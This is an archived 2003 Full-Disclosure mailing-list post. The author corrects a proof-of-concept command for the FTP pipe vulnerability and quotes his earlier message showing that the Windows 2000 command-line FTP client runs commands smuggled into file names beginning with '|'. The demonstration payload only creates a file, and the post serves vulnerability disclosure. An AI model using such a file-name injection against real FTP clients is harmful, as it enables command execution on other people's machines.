Oops. The "touch" syntax is wrong due to my lack of cut-n-paste skills. touch \|touch\ file <--------Wrong touch \|touch\ file.txt <--------Right My bad... On Tue, 25 Feb 2003, SChoe wrote: > Date: Tue, 25 Feb 2003 12:17:50 -1000 (HST) > From: SChoe <schoeat_private> > To: bugtraqat_private > Cc: full-disclosureat_private > Subject: RE: Multiple Vendor FTP pipe Vulnerability > > Securityfocus has a post on its website regarding this vulnerability in > many ftp clients. I've tested and subsequently validated this issue on > many of the platforms mentioned in their advisory. They mention > that the Netscape client on Windows 2000 Professional, but fails to > mention that the commandline ftp client included with win2k (server and > pro) are also vulnerable. > > <-----------------------snip-----------------------> > # Create file on ftp server for download by client. > schoe@ftp:/home/ftp$ touch \|touch\ file > > # Start commandline ftp client on win2k. > Microsoft Windows 2000 [Version 5.00.2195] > <C> Copyright 1985-2000 Microsoft Corp. > > C:\ ftp ftp.xxxx.com > .... > ftp> get "|touch file.txt" > ... > ftp> quit > 221 Goodbye. > > # "C:\file.txt" should now exist. > <-----------------------snap-----------------------> > > Multiple Vendor VTP pipe Vulnerability > ====================================== > www.securityfocus.com/bid/396/info .-------------------------------------------. | Sung J. Choe <schoe[at]oicinc.com>, TICSA | | Systems Admin, Facility Security Officer | .-------------------------------------------.---. | Oceanic Imaging Consultants, Inc. | | Phone #: (808) 539.3634 | .-----------------------------------. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
This archive was generated by hypermail 2b30 : Tue Feb 25 2003 - 14:40:41 PST